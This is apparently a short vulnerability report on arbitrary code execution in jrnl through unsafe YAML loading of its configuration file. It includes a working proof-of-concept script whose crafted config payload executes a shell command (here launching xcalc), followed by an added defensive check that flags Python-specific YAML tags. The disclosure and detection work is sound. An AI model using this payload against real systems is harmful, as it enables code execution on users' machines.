jrnl is a simple journal application for the command line, which is vulnerable to Arbitrary Code Execution.
It is vulnerable to a YAML deserialization attack caused by unsafe loading of its configuration file.
pip install jrnl
import os
#os.system('pip3 install jrnl')
from jrnl import config
payload = """cmd: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(payload)
config.load_config('config.yml')
python3 exploit.py
Arbitrary Code Execution
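A defensive pre-load check for the unsafe loading described above, added here as an example and not part of the original report or of jrnl's code: it lists every YAML tag in a config file that resolves to a Python-specific type, so such a file can be rejected before it reaches a loader. The function name and sample inputs are assumptions constructed for illustration; the check is a conservative lint and does not replace loading with PyYAML's `yaml.safe_load`, which refuses these tags.

```python
import re
from urllib.parse import unquote

PY_PREFIX = "tag:yaml.org,2002:python/"
# Default tag handles; a %TAG directive in the document can add or override them.
DEFAULT_HANDLES = {"!!": "tag:yaml.org,2002:", "!": "!"}

TAG_DIRECTIVE = re.compile(r"^%TAG\s+(!(?:[\w-]*!)?)\s+(\S+)", re.M)
# A tag token: verbatim !<...>, or an optional handle (!!, !name!) plus a suffix.
TAG_TOKEN = re.compile(
    r"(?<![^\s\[{,])!(?:<(?P<verb>[^>\s]+)>"
    r"|(?P<handle>[\w-]*!)?(?P<suffix>[^\s,\[\]{}!]+))"
)


def python_tags(yaml_text):
    """Return (line_number, resolved_tag) for each tag resolving to a Python type.

    Handles are resolved through %TAG directives and percent-escapes are decoded
    before comparing, so the check looks at the tag the loader would see.
    Text inside quoted scalars is also scanned (conservative by design).
    """
    handles = dict(DEFAULT_HANDLES)
    for handle, prefix in TAG_DIRECTIVE.findall(yaml_text):
        handles[handle] = prefix
    findings = []
    for lineno, line in enumerate(yaml_text.splitlines(), 1):
        if line.startswith("%"):  # directive line, already processed above
            continue
        for m in TAG_TOKEN.finditer(line):
            if m.group("verb"):
                resolved = m.group("verb")
            else:
                handle = "!" + (m.group("handle") or "")
                resolved = handles.get(handle, handle) + m.group("suffix")
            resolved = unquote(resolved)
            if resolved.startswith(PY_PREFIX):
                findings.append((lineno, resolved))
    return findings


# Constructed samples: the tag layout of the report's config, with an inert
# string value, and an ordinary settings file with no tags.
SUSPECT = 'cmd: !!python/object/new:type\nargs: ["z", !!python/tuple [], {"extend": !!python/name:exec }]\nlistitems: "pass"\n'
BENIGN = 'editor: ""\ntimeformat: "%Y-%m-%d %H:%M"\njournals:\n  default: ~/journal.txt\n'

if __name__ == "__main__":
    for lineno, tag in python_tags(SUSPECT):
        print(f"line {lineno}: {tag}")
```
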